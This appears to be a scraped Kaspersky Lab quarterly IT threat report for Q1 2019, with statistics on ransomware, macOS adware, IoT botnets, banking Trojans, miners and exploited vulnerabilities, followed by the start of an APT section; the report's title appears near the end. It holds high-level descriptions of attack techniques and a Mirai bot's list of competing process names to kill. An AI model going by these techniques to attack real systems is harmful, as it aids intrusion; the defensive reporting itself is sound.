In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019) (download)

Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.ah 28.91 2 Trojan-Ransom.AndroidOS.Rkor.h 19.42 3 Trojan-Ransom.AndroidOS.Svpeng.aj 9.46 4 Trojan-Ransom.AndroidOS.Small.as 8.81 5 Trojan-Ransom.AndroidOS.Rkor.snt 5.36 6 Trojan-Ransom.AndroidOS.Svpeng.ai 5.21 7 Trojan-Ransom.AndroidOS.Small.o 3.24 8 Trojan-Ransom.AndroidOS.Fusob.h 2.74 9 Trojan-Ransom.AndroidOS.Small.ce 2.49 10 Trojan-Ransom.AndroidOS.Svpeng.snt 2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware:

Country* %** 1 US 1.54 2 Kazakhstan 0.36 3 Iran 0.28 4 Pakistan 0.14 5 Mexico 0.10 6 Saudi Arabia 0.10 7 Canada 0.07 8 Italy 0.07 9 Indonesia 0.05 10 Belgium 0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 24.62 2 AdWare.OSX.Spc.a 20.07 3 AdWare.OSX.Pirrit.j 10.31 4 AdWare.OSX.Pirrit.p 8.44 5 AdWare.OSX.Agent.b 8.03 6 AdWare.OSX.Pirrit.o 7.45 7 AdWare.OSX.Pirrit.s 6.88 8 AdWare.OSX.Agent.c 6.03 9 AdWare.OSX.MacSearch.a 5.95 10 AdWare.OSX.Cimpli.d 5.72 11 AdWare.OSX.Mcp.a 5.71 12 AdWare.OSX.Pirrit.q 5.55 13 AdWare.OSX.MacSearch.d 4.48 14 AdWare.OSX.Agent.a 4.39 15 Downloader.OSX.InstallCore.ab 3.88 16 AdWare.OSX.Geonei.ap 3.75 17 AdWare.OSX.MacSearch.b 3.48 18 AdWare.OSX.Geonei.l 3.42 19 AdWare.OSX.Bnodlero.q 3.33 20 RiskTool.OSX.Spigot.a 3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography Country* %** 1 France 11.54 2 Spain 9.75 3 India 8.83 4 Italy 8.20 5 US 8.03 6 Canada 7.94 7 UK 7.52 8 Russia 7.51 9 Brazil 7.45 10 Mexico 6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a и AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.

IoT attacks Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive – scanning for the presence of procfs.

But we expect it to become more complex in the near future.

Second, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in the process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.

Taking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.

SSH 17% Telnet 83%

Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

SSH 64% Telnet 36%

Table of distribution of cybercriminal working sessions with Kaspersky Lab’s traps, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

Telnet-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019 (download)

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps.

Country %* 1 Egypt 13.46 2 China 13.19 3 Brazil 11.09 4 Russia 7.17 5 Greece 4.45 6 Jordan 4.14 7 US 4.12 8 Iran 3.24 9 India 3.14 10 Turkey 2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

Verdict %* 1 Backdoor.Linux.Mirai.b 71.39 2 Backdoor.Linux.Mirai.ba 20.15 3 Backdoor.Linux.Mirai.au 4.85 4 Backdoor.Linux.Mirai.c 1.35 5 Backdoor.Linux.Mirai.h 1.23 6 Backdoor.Linux.Mirai.bj 0.72 7 Trojan-Downloader.Shell.Agent.p 0.06 8 Backdoor.Linux.Hajime.b 0.06 9 Backdoor.Linux.Mirai.s 0.06 10 Backdoor.Linux.Gafgyt.bj 0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019 (download)

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps.

Verdict %* 1 China 23.24 2 US 9.60 3 Russia 6.07 4 Brazil 5.31 5 Germany 4.20 6 Vietnam 4.11 7 France 3.88 8 India 3.55 9 Egypt 2.53 10 Korea 2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH

Most often, a successful SSH-based attack resulted in the following types of malware downloaded of victim’s device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p

Financial threats Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by financial malware, Q1 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of banking malware attacks, Q1 2019 (download)

Top 10 countries by share of attacked users Country* %** South Korea 2.2 China 2.1 Belarus 1.6 Venezuela 1.6 Serbia 1.6 Greece 1.5 Egypt 1.4 Pakistan 1.3 Cameroon 1.3 Zimbabwe 1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families Name Verdicts %* 1 RTM Trojan-Banker.Win32.RTM 27.42 2 Zbot Trojan.Win32.Zbot 22.86 3 Emotet Backdoor.Win32.Emotet 9.36 4 Trickster Trojan.Win32.Trickster 6.57 5 Nymaim Trojan.Win32.Nymaim 5.85 6 Nimnul Virus.Win32.Nimnul 4.59 7 SpyEye Backdoor.Win32.SpyEye 4.29 8 Neurevt Trojan.Win32.Neurevt 3.56 9 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.64 10 Tinba Trojan-Banker.Win32.Tinba 1.39

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to assemble an archive that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new ransomware modifications, Q1 2018 – Q1 2019 (download)

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by ransomware Trojans, Q1 2019 (download)

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware Trojans, Q1 2019 (download)

Top 10 countries attacked by ransomware Trojans Country* % of users attacked by cryptors** 1 Bangladesh 8.11 2 Uzbekistan 6.36 3 Ethiopia 2.61 4 Mozambique 2.28 5 Nepal 2.09 6 Vietnam 1.37 7 Pakistan 1.14 8 Afghanistan 1.13 9 India 1.11 10 Indonesia 1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts* Percentage of attacked users** 1 WannaCry Trojan-Ransom.Win32.Wanna 26.25 2 (generic verdict) Trojan-Ransom.Win32.Phny 18.98 3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.33 4 (generic verdict) Trojan-Ransom.Win32.Crypmod 5.76 5 Shade Trojan-Ransom.Win32.Shade 3.54 6 (generic verdict) Trojan-Ransom.Win32.Encoder 3.50 7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.82 8 (generic verdict) Trojan-Ransom.Win32.Gen 2.02 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 1.51 10 (generic verdict) Trojan-Ransom.Win32.Cryptor 1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners Statistics Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new miner modifications, Q1 2019 (download)

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q1 2019 (download)

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q1 2019 (download)

Top 10 countries by share of users attacked by miners Country* %** 1 Afghanistan 12.18 2 Ethiopia 10.02 3 Uzbekistan 7.97 4 Kazakhstan 5.84 5 Tanzania 4.73 6 Ukraine 4.28 7 Mozambique 4.17 8 Belarus 3.84 9 Bolivia 3.35 10 Pakistan 3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019 (download)

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is CVE-2017-8570, a logical vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chromehttps://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html. To bypass sandboxes, it was used in conjunction with an additional exploit for the vulnerability in the win32k.sys driver (CVE-2019-0808), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID CVE-2019-0797. This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that CVE-2019-0797 is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the CVE-2018-20250 vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.

Despite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of web attack sources by country, Q1 2019 (download)

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Venezuela 29.76 2 Algeria 25.10 3 Greece 24,16 4 Albania 23.57 5 Estonia 20.27 6 Moldova 20.09 7 Ukraine 19.97 8 Serbia 19.61 9 Poland 18.89 10 Kyrgyzstan 18.36 11 Azerbaijan 18.28 12 Belarus 18.22 13 Tunisia 18.09 14 Latvia 17.62 15 Hungary 17.61 16 Bangladesh 17,17 17 Lithuania 16.71 18 Djibouti 16.66 19 Reunion 16.65 20 Tajikistan 16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web attacks in Q1 2019 (percentage of attacked users) (download)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Uzbekistan 57.73 2 Yemen 57.66 3 Tajikistan 56.35 4 Afghanistan 56.13 5 Turkmenistan 55.42 6 Kyrgyzstan 51.52 7 Ethiopia 49.21 8 Syria 47.64 9 Iraq 46,16 10 Bangladesh 45.86 11 Sudan 45.72 12 Algeria 45.35 13 Laos 44.99 14 Venezuela 44,14 15 Mongolia 43.90 16 Myanmar 43.72 17 Libya 43.30 18 Bolivia 43,17 19 Belarus 43.04 20 Azerbaijan 42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

IT threat evolution Q1 2019

23 Květen, 2019 - 12:00

Targeted attacks and malware campaigns Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used mean that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed using Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker – a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out – including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to continue making further innovations within its malware set – perhaps all their components will soon support every platform used by their victims, including Linux and Mac OS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

